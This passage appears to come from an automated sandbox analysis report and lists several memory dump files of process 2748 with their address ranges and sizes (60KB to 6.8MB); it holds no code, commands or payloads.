                                                                        • memory/2748-58-0x00007FF80BA30000-0x00007FF80BA54000-memory.dmp

                                                                          Filesize

                                                                          144KB

                                                                        • memory/2748-56-0x00007FF80BC20000-0x00007FF80BC3A000-memory.dmp

                                                                          Filesize

                                                                          104KB

                                                                        • memory/2748-54-0x00007FF80BC40000-0x00007FF80BC6D000-memory.dmp

                                                                          Filesize

                                                                          180KB

                                                                        • memory/2748-48-0x00007FF814080000-0x00007FF81408F000-memory.dmp

                                                                          Filesize

                                                                          60KB

                                                                        • memory/2748-29-0x00007FF80C210000-0x00007FF80C235000-memory.dmp

                                                                          Filesize

                                                                          148KB

                                                                        • memory/2748-25-0x00007FFFFC170000-0x00007FFFFC835000-memory.dmp

                                                                          Filesize

                                                                          6.8MB

                                                                        • memory/2748-342-0x00007FFFFBC90000-0x00007FFFFBE0F000-memory.dmp

                                                                          Filesize

                                                                          1.5MB

                                                                        • memory/2748-337-0x00007FF80C210000-0x00007FF80C235000-memory.dmp

                                                                          Filesize

                                                                          148KB

                                                                        • memory/2748-336-0x00007FFFFC170000-0x00007FFFFC835000-memory.dmp

                                                                          Filesize

                                                                          6.8MB